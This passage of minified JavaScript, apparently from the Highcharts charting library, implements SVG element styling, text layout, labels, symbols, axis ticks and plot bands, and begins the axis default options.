a&&a.width&&"text"===d.nodeName.toLowerCase()&&A(a.width);b&&(a=t(b,c));this.styles=a;e&&(da||!ba&&this.renderer.forExport)&&delete a.width;if(pa&&!ba)X(this.element,a);else{b=function(a,b){return"-"+b.toLowerCase()};for(f in a)g+=f.replace(/([A-Z])/g,b)+":"+a[f]+";";G(d,"style",g)}e&&this.added&&this.renderer.buildText(this)}return this},on:function(a,b){var c=this,d=c.element;Ga&&"click"===a?(d.ontouchstart=function(a){c.touchEventFired=Date.now();a.preventDefault();b.call(d,a)},d.onclick=function(a){(-1===
ma.indexOf("Android")||1100<Date.now()-(c.touchEventFired||0))&&b.call(d,a)}):d["on"+a]=b;return this},setRadialReference:function(a){this.element.radialReference=a;return this},translate:function(a,b){return this.attr({translateX:a,translateY:b})},invert:function(){this.inverted=!0;this.updateTransform();return this},updateTransform:function(){var a=this.translateX||0,b=this.translateY||0,c=this.scaleX,d=this.scaleY,e=this.inverted,f=this.rotation,g=this.element;e&&(a+=this.attr("width"),b+=this.attr("height"));
a=["translate("+a+","+b+")"];e?a.push("rotate(90) scale(-1,1)"):f&&a.push("rotate("+f+" "+(g.getAttribute("x")||0)+" "+(g.getAttribute("y")||0)+")");(u(c)||u(d))&&a.push("scale("+r(c,1)+" "+r(d,1)+")");a.length&&g.setAttribute("transform",a.join(" "))},toFront:function(){var a=this.element;a.parentNode.appendChild(a);return this},align:function(a,b,c){var d,e,f,g,h={};e=this.renderer;f=e.alignedObjects;if(a){if(this.alignOptions=a,this.alignByTranslate=b,!c||U(c))this.alignTo=d=c||"renderer",oa(f,
this),f.push(this),c=null}else a=this.alignOptions,b=this.alignByTranslate,d=this.alignTo;c=r(c,e[d],e);d=a.align;e=a.verticalAlign;f=(c.x||0)+(a.x||0);g=(c.y||0)+(a.y||0);if("right"===d||"center"===d)f+=(c.width-(a.width||0))/{right:1,center:2}[d];h[b?"translateX":"x"]=z(f);if("bottom"===e||"middle"===e)g+=(c.height-(a.height||0))/({bottom:1,middle:2}[e]||1);h[b?"translateY":"y"]=z(g);this[this.placed?"animate":"attr"](h);this.placed=!0;this.alignAttr=h;return this},getBBox:function(){var a=this.bBox,
b=this.renderer,c,d,e=this.rotation;c=this.element;var f=this.styles,g=e*Ab;d=this.textStr;var h;if(""===d||Mb.test(d))h="num."+d.toString().length+(f?"|"+f.fontSize+"|"+f.fontFamily:"");h&&(a=b.cache[h]);if(!a){if(c.namespaceURI===ja||b.forExport){try{a=c.getBBox?t({},c.getBBox()):{width:c.offsetWidth,height:c.offsetHeight}}catch(k){}if(!a||0>a.width)a={width:0,height:0}}else a=this.htmlGetBBox();b.isSVG&&(c=a.width,d=a.height,pa&&f&&"11px"===f.fontSize&&"16.9"===d.toPrecision(3)&&(a.height=d=14),
e&&(a.width=R(d*Ra(g))+R(c*Fa(g)),a.height=R(d*Fa(g))+R(c*Ra(g))));this.bBox=a;h&&(b.cache[h]=a)}return a},show:function(a){return a&&this.element.namespaceURI===ja?(this.element.removeAttribute("visibility"),this):this.attr({visibility:a?"inherit":"visible"})},hide:function(){return this.attr({visibility:"hidden"})},fadeOut:function(a){var b=this;b.animate({opacity:0},{duration:a||150,complete:function(){b.hide()}})},add:function(a){var b=this.renderer,c=a||b,d=c.element||b.box,e=this.element,f=
this.zIndex,g,h;a&&(this.parentGroup=a);this.parentInverted=a&&a.inverted;void 0!==this.textStr&&b.buildText(this);f&&(c.handleZ=!0,f=A(f));if(c.handleZ)for(a=d.childNodes,g=0;g<a.length;g++)if(b=a[g],c=G(b,"zIndex"),b!==e&&(A(c)>f||!u(f)&&u(c))){d.insertBefore(e,b);h=!0;break}h||d.appendChild(e);this.added=!0;if(this.onAdd)this.onAdd();return this},safeRemoveChild:function(a){var b=a.parentNode;b&&b.removeChild(a)},destroy:function(){var a=this,b=a.element||{},c=a.shadows,d=a.renderer.isSVG&&"SPAN"===
b.nodeName&&a.parentGroup,e,f;b.onclick=b.onmouseout=b.onmouseover=b.onmousemove=b.point=null;Ya(a);a.clipPath&&(a.clipPath=a.clipPath.destroy());if(a.stops){for(f=0;f<a.stops.length;f++)a.stops[f]=a.stops[f].destroy();a.stops=null}a.safeRemoveChild(b);for(c&&s(c,function(b){a.safeRemoveChild(b)});d&&0===d.div.childNodes.length;)b=d.parentGroup,a.safeRemoveChild(d.div),delete d.div,d=b;a.alignTo&&oa(a.renderer.alignedObjects,a);for(e in a)delete a[e];return null},shadow:function(a,b,c){var d=[],e,
f,g=this.element,h,k,l,m;if(a){k=r(a.width,3);l=(a.opacity||0.15)/k;m=this.parentInverted?"(-1,-1)":"("+r(a.offsetX,1)+", "+r(a.offsetY,1)+")";for(e=1;e<=k;e++)f=g.cloneNode(0),h=2*k+1-2*e,G(f,{isShadow:"true",stroke:a.color||"black","stroke-opacity":l*e,"stroke-width":h,transform:"translate"+m,fill:ca}),c&&(G(f,"height",x(G(f,"height")-h,0)),f.cutHeight=h),b?b.element.appendChild(f):g.parentNode.insertBefore(f,g),d.push(f);this.shadows=d}return this},xGetter:function(a){"circle"===this.element.nodeName&&
(a={x:"cx",y:"cy"}[a]||a);return this._defaultGetter(a)},_defaultGetter:function(a){a=r(this[a],this.element?this.element.getAttribute(a):null,0);/^[0-9\.]+$/.test(a)&&(a=parseFloat(a));return a},dSetter:function(a,b,c){a&&a.join&&(a=a.join(" "));/(NaN| {2}|^$)/.test(a)&&(a="M 0 0");c.setAttribute(b,a);this[b]=a},dashstyleSetter:function(a){var b;if(a=a&&a.toLowerCase()){a=a.replace("shortdashdotdot","3,1,1,1,1,1,").replace("shortdashdot","3,1,1,1").replace("shortdot","1,1,").replace("shortdash",
"3,1,").replace("longdash","8,3,").replace(/dot/g,"1,3,").replace("dash","4,3,").replace(/,$/,"").split(",");for(b=a.length;b--;)a[b]=A(a[b])*this.element.getAttribute("stroke-width");a=a.join(",");this.element.setAttribute("stroke-dasharray",a)}},alignSetter:function(a){this.element.setAttribute("text-anchor",{left:"start",center:"middle",right:"end"}[a])},opacitySetter:function(a,b,c){this[b]=a;c.setAttribute(b,a)},"stroke-widthSetter":function(a,b,c){0===a&&(a=1E-5);this.strokeWidth=a;c.setAttribute(b,
a)},titleSetter:function(a){var b=this.element.getElementsByTagName("title")[0];b||(b=y.createElementNS(ja,"title"),this.element.appendChild(b));b.textContent=a},textSetter:function(a){a!==this.textStr&&(delete this.bBox,this.textStr=a,this.added&&this.renderer.buildText(this))},fillSetter:function(a,b,c){"string"===typeof a?c.setAttribute(b,a):a&&this.colorGradient(a,b,c)},zIndexSetter:function(a,b,c){c.setAttribute(b,a);this[b]=a},_defaultSetter:function(a,b,c){c.setAttribute(b,a)}};W.prototype.yGetter=
W.prototype.xGetter;W.prototype.translateXSetter=W.prototype.translateYSetter=W.prototype.rotationSetter=W.prototype.verticalAlignSetter=W.prototype.scaleXSetter=W.prototype.scaleYSetter=function(a,b){this[b]=a;this.doTransform=!0};W.prototype.strokeSetter=W.prototype.fillSetter;var Za=function(){this.init.apply(this,arguments)};Za.prototype={Element:W,init:function(a,b,c,d,e){var f=location,g;d=this.createElement("svg").attr({version:"1.1"}).css(this.getStyle(d));g=d.element;a.appendChild(g);-1===
a.innerHTML.indexOf("xmlns")&&G(g,"xmlns",ja);this.isSVG=!0;this.box=g;this.boxWrapper=d;this.alignedObjects=[];this.url=(Sa||Bb)&&y.getElementsByTagName("base").length?f.href.replace(/#.*?$/,"").replace(/([\('\)])/g,"\\$1").replace(/ /g,"%20"):"";this.createElement("desc").add().element.appendChild(y.createTextNode("Created with @product.name@ @product.version@"));this.defs=this.createElement("defs").add();this.forExport=e;this.gradients={};this.cache={};this.setSize(b,c,!1);var h;Sa&&a.getBoundingClientRect&&
(this.subPixelFix=b=function(){X(a,{left:0,top:0});h=a.getBoundingClientRect();X(a,{left:ya(h.left)-h.left+"px",top:ya(h.top)-h.top+"px"})},b(),N(O,"resize",b))},getStyle:function(a){return this.style=t({fontFamily:'"Lucida Grande", "Lucida Sans Unicode", Arial, Helvetica, sans-serif',fontSize:"12px"},a)},isHidden:function(){return!this.boxWrapper.getBBox().width},destroy:function(){var a=this.defs;this.box=null;this.boxWrapper=this.boxWrapper.destroy();Da(this.gradients||{});this.gradients=null;
a&&(this.defs=a.destroy());this.subPixelFix&&T(O,"resize",this.subPixelFix);return this.alignedObjects=null},createElement:function(a){var b=new this.Element;b.init(this,a);return b},draw:function(){},buildText:function(a){for(var b=a.element,c=this,d=c.forExport,e=r(a.textStr,"").toString(),f=-1!==e.indexOf("<"),g=b.childNodes,h,k,l=G(b,"x"),m=a.styles,n=a.textWidth,q=m&&m.lineHeight,p=g.length,w=function(a){return q?A(q):c.fontMetrics(/(px|em)$/.test(a&&a.style.fontSize)?a.style.fontSize:m&&m.fontSize||
c.style.fontSize||12).h};p--;)b.removeChild(g[p]);f||-1!==e.indexOf(" ")?(h=/<.*style="([^"]+)".*>/,k=/<.*href="(http[^"]+)".*>/,n&&!a.added&&this.box.appendChild(b),e=f?e.replace(/<(b|strong)>/g,'<span style="font-weight:bold">').replace(/<(i|em)>/g,'<span style="font-style:italic">').replace(/<a/g,"<span").replace(/<\/(b|strong|i|em|a)>/g,"</span>").split(/<br.*?>/g):[e],""===e[e.length-1]&&e.pop(),s(e,function(e,f){var g,p=0;e=e.replace(/<span/g,"|||<span").replace(/<\/span>/g,"</span>|||");g=
e.split("|||");s(g,function(e){if(""!==e||1===g.length){var q={},r=y.createElementNS(ja,"tspan"),s;h.test(e)&&(s=e.match(h)[1].replace(/(;| |^)color([ :])/,"$1fill$2"),G(r,"style",s));k.test(e)&&!d&&(G(r,"onclick",'location.href="'+e.match(k)[1]+'"'),X(r,{cursor:"pointer"}));e=(e.replace(/<(.|\n)*?>/g,"")||" ").replace(/</g,"<").replace(/>/g,">");if(" "!==e&&(r.appendChild(y.createTextNode(e)),p?q.dx=0:f&&null!==l&&(q.x=l),G(r,q),!p&&f&&(!ba&&d&&X(r,{display:"block"}),G(r,"dy",w(r),Bb&&r.offsetHeight)),
b.appendChild(r),p++,n)){e=e.replace(/([^\^])-/g,"$1- ").split(" ");for(var q=1<e.length&&"nowrap"!==m.whiteSpace,ob,u,D=a._clipHeight,x=[],v=w(),t=1;q&&(e.length||x.length);)delete a.bBox,ob=a.getBBox(),u=ob.width,!ba&&c.forExport&&(u=c.measureSpanWidth(r.firstChild.data,a.styles)),(ob=u>n)&&1!==e.length?(r.removeChild(r.firstChild),x.unshift(e.pop())):(e=x,x=[],e.length&&(t++,D&&t*v>D?(e=["..."],a.attr("title",a.textStr)):(r=y.createElementNS(ja,"tspan"),G(r,{dy:v,x:l}),s&&G(r,"style",s),b.appendChild(r),
u>n&&(n=u)))),e.length&&r.appendChild(y.createTextNode(e.join(" ").replace(/- /g,"-")))}}})})):b.appendChild(y.createTextNode(e))},button:function(a,b,c,d,e,f,g,h,k){var l=this.label(a,b,c,k,null,null,null,null,"button"),m=0,n,q,p,w,r,s;a={x1:0,y1:0,x2:0,y2:1};e=E({"stroke-width":1,stroke:"#CCCCCC",fill:{linearGradient:a,stops:[[0,"#FEFEFE"],[1,"#F6F6F6"]]},r:2,padding:5,style:{color:"black"}},e);p=e.style;delete e.style;f=E(e,{stroke:"#68A",fill:{linearGradient:a,stops:[[0,"#FFF"],[1,"#ACF"]]}},
f);w=f.style;delete f.style;g=E(e,{stroke:"#68A",fill:{linearGradient:a,stops:[[0,"#9BD"],[1,"#CDF"]]}},g);r=g.style;delete g.style;h=E(e,{style:{color:"#CCC"}},h);s=h.style;delete h.style;N(l.element,pa?"mouseover":"mouseenter",function(){3!==m&&l.attr(f).css(w)});N(l.element,pa?"mouseout":"mouseleave",function(){3!==m&&(n=[e,f,g][m],q=[p,w,r][m],l.attr(n).css(q))});l.setState=function(a){(l.state=m=a)?2===a?l.attr(g).css(r):3===a&&l.attr(h).css(s):l.attr(e).css(p)};return l.on("click",function(){3!==
m&&d.call(l)}).attr(e).css(t({cursor:"default"},p))},crispLine:function(a,b){a[1]===a[4]&&(a[1]=a[4]=z(a[1])-b%2/2);a[2]===a[5]&&(a[2]=a[5]=z(a[2])+b%2/2);return a},path:function(a){var b={fill:ca};ka(a)?b.d=a:V(a)&&t(b,a);return this.createElement("path").attr(b)},circle:function(a,b,c){a=V(a)?a:{x:a,y:b,r:c};b=this.createElement("circle");b.xSetter=function(a){this.element.setAttribute("cx",a)};b.ySetter=function(a){this.element.setAttribute("cy",a)};return b.attr(a)},arc:function(a,b,c,d,e,f){V(a)&&
(b=a.y,c=a.r,d=a.innerR,e=a.start,f=a.end,a=a.x);a=this.symbol("arc",a||0,b||0,c||0,c||0,{innerR:d||0,start:e||0,end:f||0});a.r=c;return a},rect:function(a,b,c,d,e,f){e=V(a)?a.r:e;var g=this.createElement("rect");a=V(a)?a:a===v?{}:{x:a,y:b,width:x(c,0),height:x(d,0)};f!==v&&(a.strokeWidth=f,a=g.crisp(a));e&&(a.r=e);g.rSetter=function(a){G(this.element,{rx:a,ry:a})};return g.attr(a)},setSize:function(a,b,c){var d=this.alignedObjects,e=d.length;this.width=a;this.height=b;for(this.boxWrapper[r(c,!0)?
"animate":"attr"]({width:a,height:b});e--;)d[e].align()},g:function(a){var b=this.createElement("g");return u(a)?b.attr({"class":"highcharts-"+a}):b},image:function(a,b,c,d,e){var f={preserveAspectRatio:ca};1<arguments.length&&t(f,{x:b,y:c,width:d,height:e});f=this.createElement("image").attr(f);f.element.setAttributeNS?f.element.setAttributeNS("http://www.w3.org/1999/xlink","href",a):f.element.setAttribute("hc-svg-href",a);return f},symbol:function(a,b,c,d,e,f){var g,h=this.symbols[a],h=h&&h(z(b),
z(c),d,e,f),k=/^url\((.*?)\)$/,l,m;h?(g=this.path(h),t(g,{symbolName:a,x:b,y:c,width:d,height:e}),f&&t(g,f)):k.test(a)&&(m=function(a,b){a.element&&(a.attr({width:b[0],height:b[1]}),a.alignByTranslate||a.translate(z((d-b[0])/2),z((e-b[1])/2)))},l=a.match(k)[1],a=Db[l],g=this.image(l).attr({x:b,y:c}),g.isImg=!0,a?m(g,a):(g.attr({width:0,height:0}),ta("img",{onload:function(){m(g,Db[l]=[this.width,this.height])},src:l})));return g},symbols:{circle:function(a,b,c,d){var e=0.166*c;return["M",a+c/2,b,
"C",a+c+e,b,a+c+e,b+d,a+c/2,b+d,"C",a-e,b+d,a-e,b,a+c/2,b,"Z"]},square:function(a,b,c,d){return["M",a,b,"L",a+c,b,a+c,b+d,a,b+d,"Z"]},triangle:function(a,b,c,d){return["M",a+c/2,b,"L",a+c,b+d,a,b+d,"Z"]},"triangle-down":function(a,b,c,d){return["M",a,b,"L",a+c,b,a+c/2,b+d,"Z"]},diamond:function(a,b,c,d){return["M",a+c/2,b,"L",a+c,b+d/2,a+c/2,b+d,a,b+d/2,"Z"]},arc:function(a,b,c,d,e){var f=e.start;c=e.r||c||d;var g=e.end-0.001;d=e.innerR;var h=e.open,k=Fa(f),l=Ra(f),m=Fa(g),g=Ra(g);e=e.end-f<zb?0:
1;return["M",a+c*k,b+c*l,"A",c,c,0,e,1,a+c*m,b+c*g,h?"M":"L",a+d*m,b+d*g,"A",d,d,0,e,0,a+d*k,b+d*l,h?"":"Z"]},callout:function(a,b,c,d,e){var f=J(e&&e.r||0,c,d),g=f+6,h=e&&e.anchorX,k=e&&e.anchorY;e=z(e.strokeWidth||0)%2/2;a+=e;b+=e;e=["M",a+f,b,"L",a+c-f,b,"C",a+c,b,a+c,b,a+c,b+f,"L",a+c,b+d-f,"C",a+c,b+d,a+c,b+d,a+c-f,b+d,"L",a+f,b+d,"C",a,b+d,a,b+d,a,b+d-f,"L",a,b+f,"C",a,b,a,b,a+f,b];h&&h>c&&k>b+g&&k<b+d-g?e.splice(13,3,"L",a+c,k-6,a+c+6,k,a+c,k+6,a+c,b+d-f):h&&0>h&&k>b+g&&k<b+d-g?e.splice(33,
3,"L",a,k+6,a-6,k,a,k-6,a,b+f):k&&k>d&&h>a+g&&h<a+c-g?e.splice(23,3,"L",h+6,b+d,h,b+d+6,h-6,b+d,a+f,b+d):k&&0>k&&h>a+g&&h<a+c-g&&e.splice(3,3,"L",h-6,b,h,b-6,h+6,b,c-f,b);return e}},clipRect:function(a,b,c,d){var e="highcharts-"+kb++,f=this.createElement("clipPath").attr({id:e}).add(this.defs);a=this.rect(a,b,c,d,0).add(f);a.id=e;a.clipPath=f;return a},text:function(a,b,c,d){var e=da||!ba&&this.forExport,f={};if(d&&!this.forExport)return this.html(a,b,c);f.x=Math.round(b||0);c&&(f.y=Math.round(c));
if(a||0===a)f.text=a;a=this.createElement("text").attr(f);e&&a.css({position:"absolute"});d||(a.xSetter=function(a,b,c){var d=c.childNodes,e,f;for(f=1;f<d.length;f++)e=d[f],e.getAttribute("x")===c.getAttribute("x")&&e.setAttribute("x",a);c.setAttribute(b,a)});return a},fontMetrics:function(a){a=a||this.style.fontSize;a=/px/.test(a)?A(a):/em/.test(a)?12*parseFloat(a):12;a=24>a?a+4:z(1.2*a);var b=z(0.8*a);return{h:a,b:b}},label:function(a,b,c,d,e,f,g,h,k){function l(){var a,b;a=w.element.style;P=(void 0===
Ba||void 0===pb||p.styles.textAlign)&&w.textStr&&w.getBBox();p.width=(Ba||P.width||0)+2*K+x;p.height=(pb||P.height||0)+2*K;Ia=K+q.fontMetrics(a&&a.fontSize).b;y&&(r||(a=z(-na*K),b=h?-Ia:0,p.box=r=d?q.symbol(d,a,b,p.width,p.height,D):q.rect(a,b,p.width,p.height,0,D[Nb]),r.attr("fill",ca).add(p)),r.isImg||r.attr(t({width:z(p.width),height:z(p.height)},D)),D=null)}function m(){var a=p.styles,a=a&&a.textAlign,b=x+K*(1-na),c;c=h?0:Ia;u(Ba)&&P&&("center"===a||"right"===a)&&(b+={center:0.5,right:1}[a]*(Ba-
P.width));if(b!==w.x||c!==w.y)w.attr("x",b),c!==v&&w.attr("y",c);w.x=b;w.y=c}function n(a,b){r?r.attr(a,b):D[a]=b}var q=this,p=q.g(k),w=q.text("",0,0,g).attr({zIndex:1}),r,P,na=0,K=3,x=0,Ba,pb,qb,H,Fb=0,D={},Ia,y;p.onAdd=function(){w.add(p);p.attr({text:a||"",x:b,y:c});r&&u(e)&&p.attr({anchorX:e,anchorY:f})};p.widthSetter=function(a){Ba=a};p.heightSetter=function(a){pb=a};p.paddingSetter=function(a){u(a)&&a!==K&&(K=a,m())};p.paddingLeftSetter=function(a){u(a)&&a!==x&&(x=a,m())};p.alignSetter=function(a){na=
{left:0,center:0.5,right:1}[a]};p.textSetter=function(a){a!==v&&w.textSetter(a);l();m()};p["stroke-widthSetter"]=function(a,b){a&&(y=!0);Fb=a%2/2;n(b,a)};p.strokeSetter=p.fillSetter=p.rSetter=function(a,b){"fill"===b&&a&&(y=!0);n(b,a)};p.anchorXSetter=function(a,b){e=a;n(b,a+Fb-qb)};p.anchorYSetter=function(a,b){f=a;n(b,a-H)};p.xSetter=function(a){p.x=a;na&&(a-=na*((Ba||P.width)+K));qb=z(a);p.attr("translateX",qb)};p.ySetter=function(a){H=p.y=z(a);p.attr("translateY",H)};var B=p.css;return t(p,{css:function(a){if(a){var b=
{};a=E(a);s("fontSize fontWeight fontFamily color lineHeight width textDecoration textShadow".split(" "),function(c){a[c]!==v&&(b[c]=a[c],delete a[c])});w.css(b)}return B.call(p,a)},getBBox:function(){return{width:P.width+2*K,height:P.height+2*K,x:P.x-K,y:P.y-K}},shadow:function(a){r&&r.shadow(a);return p},destroy:function(){T(p.element,"mouseenter");T(p.element,"mouseleave");w&&(w=w.destroy());r&&(r=r.destroy());W.prototype.destroy.call(p);p=q=l=m=n=null}})}};Ta=Za;var rb,Gb;da&&(S.CanVGRenderer=
rb=function(){ja="http://www.w3.org/1999/xhtml"},rb.prototype.symbols={},Gb=function(){function a(){var a=b.length,d;for(d=0;d<a;d++)b[d]();b=[]}var b=[];return{push:function(c,d){0===b.length&&Ob(d,a);b.push(c)}}}(),Ta=rb);xa.prototype={addLabel:function(){var a=this.axis,b=a.options,c=a.chart,d=a.horiz,e=a.categories,f=a.names,g=this.pos,h=b.labels,k=a.tickPositions,d=d&&e&&!h.step&&!h.staggerLines&&!h.rotation&&c.plotWidth/k.length||!d&&(c.margin[3]||0.33*c.chartWidth),l=g===k[0],m=g===k[k.length-
1],n,f=e?r(e[g],f[g],g):g,e=this.label,q=k.info;a.isDatetimeAxis&&q&&(n=b.dateTimeLabelFormats[q.higherRanks[g]||q.unitName]);this.isFirst=l;this.isLast=m;b=a.labelFormatter.call({axis:a,chart:c,isFirst:l,isLast:m,dateTimeLabelFormat:n,value:a.isLog?ia(L(f)):f});g=d&&{width:x(1,z(d-2*(h.padding||10)))+"px"};g=t(g,h.style);u(e)?e&&e.attr({text:b}).css(g):(n={align:a.labelAlign},$(h.rotation)&&(n.rotation=h.rotation),d&&h.ellipsis&&(n._clipHeight=a.len/k.length),this.label=u(b)&&h.enabled?c.renderer.text(b,
0,0,h.useHTML).attr(n).css(g).add(a.labelGroup):null)},getLabelSize:function(){var a=this.label,b=this.axis;return a?a.getBBox()[b.horiz?"height":"width"]:0},getLabelSides:function(){var a=this.label.getBBox(),b=this.axis,c=b.horiz,d=b.options.labels,a=c?a.width:a.height,b=c?d.x-a*{left:0,center:0.5,right:1}[b.labelAlign]:0;return[b,c?a+b:a]},handleOverflow:function(a,b){var c=!0,d=this.axis,e=this.isFirst,f=this.isLast,g=d.horiz?b.x:b.y,h=d.reversed,k=d.tickPositions,l=this.getLabelSides(),m=l[0],
l=l[1],n,q,p,w=this.label.line||0;n=d.labelEdge;q=d.justifyLabels&&(e||f);n[w]===v||g+m>n[w]?n[w]=g+l:q||(c=!1);if(q){n=(q=d.justifyToPlot)?d.pos:0;q=q?n+d.len:d.chart.chartWidth;do a+=e?1:-1,p=d.ticks[k[a]];while(k[a]&&(!p||p.label.line!==w));d=p&&p.label.xy&&p.label.xy.x+p.getLabelSides()[e?0:1];e&&!h||f&&h?g+m<n&&(g=n-m,p&&g+l>d&&(c=!1)):g+l>q&&(g=q-l,p&&g+m<d&&(c=!1));b.x=g}return c},getPosition:function(a,b,c,d){var e=this.axis,f=e.chart,g=d&&f.oldChartHeight||f.chartHeight;return{x:a?e.translate(b+
c,null,null,d)+e.transB:e.left+e.offset+(e.opposite?(d&&f.oldChartWidth||f.chartWidth)-e.right-e.left:0),y:a?g-e.bottom+e.offset-(e.opposite?e.height:0):g-e.translate(b+c,null,null,d)-e.transB}},getLabelPosition:function(a,b,c,d,e,f,g,h){var k=this.axis,l=k.transA,m=k.reversed,n=k.staggerLines,q=k.chart.renderer.fontMetrics(e.style.fontSize).b,p=e.rotation;a=a+e.x-(f&&d?f*l*(m?-1:1):0);b=b+e.y-(f&&!d?f*l*(m?1:-1):0);p&&2===k.side&&(b-=q-q*Fa(p*Ab));u(e.y)||p||(b+=q-c.getBBox().height/2);n&&(c.line=
g/(h||1)%n,b+=k.labelOffset/n*c.line);return{x:a,y:b}},getMarkPath:function(a,b,c,d,e,f){return f.crispLine(["M",a,b,"L",a+(e?0:-c),b+(e?c:0)],d)},render:function(a,b,c){var d=this.axis,e=d.options,f=d.chart.renderer,g=d.horiz,h=this.type,k=this.label,l=this.pos,m=e.labels,n=this.gridLine,q=h?h+"Grid":"grid",p=h?h+"Tick":"tick",w=e[q+"LineWidth"],s=e[q+"LineColor"],P=e[q+"LineDashStyle"],u=e[p+"Length"],q=e[p+"Width"]||0,K=e[p+"Color"],x=e[p+"Position"],p=this.mark,t=m.step,z=!0,y=d.tickmarkOffset,
H=this.getPosition(g,l,y,b),B=H.x,H=H.y,D=g&&B===d.pos+d.len||!g&&H===d.pos?-1:1;this.isActive=!0;if(w&&(l=d.getPlotLinePath(l+y,w*D,b,!0),n===v&&(n={stroke:s,"stroke-width":w},P&&(n.dashstyle=P),h||(n.zIndex=1),b&&(n.opacity=0),this.gridLine=n=w?f.path(l).attr(n).add(d.gridGroup):null),!b&&n&&l))n[this.isNew?"attr":"animate"]({d:l,opacity:c});q&&u&&("inside"===x&&(u=-u),d.opposite&&(u=-u),h=this.getMarkPath(B,H,u,q*D,g,f),p?p.animate({d:h,opacity:c}):this.mark=f.path(h).attr({stroke:K,"stroke-width":q,
opacity:c}).add(d.axisGroup));k&&!isNaN(B)&&(k.xy=H=this.getLabelPosition(B,H,k,g,m,y,a,t),this.isFirst&&!this.isLast&&!r(e.showFirstLabel,1)||this.isLast&&!this.isFirst&&!r(e.showLastLabel,1)?z=!1:d.isRadial||m.step||m.rotation||b||0===c||(z=this.handleOverflow(a,H)),t&&a%t&&(z=!1),z&&!isNaN(H.y)?(H.opacity=c,k[this.isNew?"attr":"animate"](H),this.isNew=!1):k.attr("y",-9999))},destroy:function(){Da(this,this.axis)}};S.PlotLineOrBand=function(a,b){this.axis=a;b&&(this.options=b,this.id=b.id)};S.PlotLineOrBand.prototype=
{render:function(){var a=this,b=a.axis,c=b.horiz,d=(b.pointRange||0)/2,e=a.options,f=e.label,g=a.label,h=e.width,k=e.to,l=e.from,m=u(l)&&u(k),n=e.value,q=e.dashStyle,p=a.svgElem,w=[],s,P=e.color,t=e.zIndex,K=e.events,v={},z=b.chart.renderer;b.isLog&&(l=aa(l),k=aa(k),n=aa(n));if(h)w=b.getPlotLinePath(n,h),v={stroke:P,"stroke-width":h},q&&(v.dashstyle=q);else if(m)l=x(l,b.min-d),k=J(k,b.max+d),w=b.getPlotBandPath(l,k,e),P&&(v.fill=P),e.borderWidth&&(v.stroke=e.borderColor,v["stroke-width"]=e.borderWidth);
else return;u(t)&&(v.zIndex=t);if(p)w?p.animate({d:w},null,p.onGetPath):(p.hide(),p.onGetPath=function(){p.show()},g&&(a.label=g=g.destroy()));else if(w&&w.length&&(a.svgElem=p=z.path(w).attr(v).add(),K))for(s in d=function(b){p.on(b,function(c){K[b].apply(a,[c])})},K)d(s);f&&u(f.text)&&w&&w.length&&0<b.width&&0<b.height?(f=E({align:c&&m&&"center",x:c?!m&&4:10,verticalAlign:!c&&m&&"middle",y:c?m?16:10:m?6:-4,rotation:c&&!m&&90},f),g||(v={align:f.textAlign||f.align,rotation:f.rotation},u(t)&&(v.zIndex=
t),a.label=g=z.text(f.text,0,0,f.useHTML).attr(v).css(f.style).add()),b=[w[1],w[4],r(w[6],w[1])],w=[w[2],w[5],r(w[7],w[2])],c=va(b),m=va(w),g.align(f,!1,{x:c,y:m,width:la(b)-c,height:la(w)-m}),g.show()):g&&g.hide();return a},destroy:function(){oa(this.axis.plotLinesAndBands,this);delete this.axis;Da(this)}};sa.prototype={defaultOptions:{dateTimeLabelFormats:{millisecond:"%H:%M:%S.%L",second:"%H:%M:%S",minute:"%H:%M",hour:"%H:%M",day:"%e. %b",week:"%e. %b",month:"%b '%y",year:"%Y"},endOnTick:!1,gridLineColor:"#C0C0C0",
labels:nb,lineColor:"#C0D0E0",lineWidth:1,minPadding:0.01,maxPadding:0.01,minorGridLineColor:"#E0E0E0",minorGridLineWidth:1,minorTickColor:"#A0A0A0",minorTickLength:2,minorTickPosition:"outside",startOfWeek:1,startOnTick:!1,tickColor:"#C0D0E0",tickLength:10,tickmarkPlacement:"between",tickPixelInterval:100,tickPosition:"outside",tickWidth:1,title:{align:"middle",style:{color:"#707070"}},type:"linear"},defaultYAxisOptions:{endOnTick:!0,gridLineWidth:1,tickPixelInterval:72,showLastLabel:!0,labels:{x:-8,
y:3},lineWidth:0,maxPadding:0.05,minPadding:0.05,startOnTick:!0,tickWidth:0,title:{rotation:270,text:"Values"},stackLabels:{enabled:!1,formatter:function(){return qa(this.total,-1)},style:nb.style}},defaultLeftAxisOptions:{labels:{x:-15,y:null},title:{rotation:270}},defaultRightAxisOptions:{labels:{x:15,y:null},title:{rotation:90}},defaultBottomAxisOptions:{labels:{x:0,y:20},title:{rotation:0}},defaultTopAxisOptions:{labels:{x:0,y:-15},title:{rotation:0}},init:function(a,b){var c=b.isX;this.horiz=
a.inverted?!c:c;this.coll=(this.isXAxis=c)?"xAxis":"yAxis";this.opposite=b.opposite;this.side=b.side||(this.horiz?this.opposite?0:2:this.opposite?1:3);this.setOptions(b);var d=this.options,e=d.type;this.labelFormatter=d.labels.formatter||this.defaultLabelFormatter;this.userOptions=b;this.minPixelPadding=0;this.chart=a;this.reversed=d.reversed;this.zoomEnabled=!1!==d.zoomEnabled;this.categories=d.categories||"category"===e;this.names=[];this.isLog="logarithmic"===e;this.isDatetimeAxis="datetime"===
e;this.isLinked=u(d.linkedTo);this.tickmarkOffset=this.categories&&"between"===d.tickmarkPlacement?0.5:0;this.ticks={};this.labelEdge=[];this.minorTicks={};this.plotLinesAndBands=[];this.alternateBands={};this.len=0;this.minRange=this.userMinRange=d.minRange||d.maxZoom;this.range=d.range;this.offset=d.offset||0;this.stacks={};this.oldStacks={};this.min=this.max=null;this.crosshair=r(d.crosshair,ha(a.options.tooltip.crosshairs)[c?0:1],!1);var f,d=this.options.events;-1===Wa(this,a.axes)&&(c&&!this.isColorAxis?
a.axes.splice(a.xAxis.length,0,this):a.axes.push(this),a[this.coll].push(this));this.series=this.series||[];a.inverted&&c&&this.reversed===v&&(this.reversed=!0);this.removePlotLine=this.removePlotBand=this.removePlotBandOrLine;for(f in d)N(this,f,d[f]);this.isLog&&(this.val2lin=aa,this.lin2val=L)},setOptions:function(a){this.options=E(this.defaultOptions,this.isXAxis?{}:this.defaultYAxisOptions,[this.defaultTopAxisOptions,this.defaultRightAxisOptions,this.defaultBottomAxisOptions,this.defaultLeftAxisOptions][this.side],
